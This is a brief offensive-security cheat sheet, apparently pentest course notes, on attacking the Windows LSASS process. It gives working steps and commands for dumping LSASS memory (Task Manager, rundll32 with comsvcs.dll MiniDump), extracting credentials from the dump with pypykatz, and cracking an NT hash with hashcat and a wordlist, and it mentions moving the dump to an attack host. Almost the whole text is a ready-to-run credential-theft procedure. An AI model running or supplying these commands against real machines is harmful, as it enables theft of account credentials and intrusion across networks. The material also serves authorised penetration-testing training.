Attacking LSASS

Dumping LSASS Process Memory

Task Manager Method

Open Task Manager > Select the Processes tab > Find & right click the Local Security Authority Process > Select Create dump file

A file called lsass.DMP is created and saved in:

C:\\Users\\loggedonusersdirectory\\AppData\\Local\\Temp

This is the file we will transfer to our attack host

Rundll32.exe & Comsvcs.dll Method

# Finding LSASS PID in cmd
# From cmd, we can issue the command tasklist /svc and find lsass.exe and its process ID in the PID field.
C:\\Windows\\system32> tasklist /svc

# Finding LSASS PID in PowerShell
# From PowerShell, we can issue the command Get-Process lsass and see the process ID in the Id field.
Get-Process lsass

# Creating lsass.dmp using PowerShell
rundll32 C:\\windows\\system32\\comsvcs.dll, MiniDump 672 C:\\lsass.dmp full

Using Pypykatz to Extract Credentials

# Running pypykatz 
pypykatz lsa minidump /home/peter/Documents/lsass.dmp

# Cracking the NT Hash with Hashcat
sudo hashcat -m 1000 64f12cddaa88057e06a81b54e73b949b /usr/share/wordlists/rockyou.txt

Last updated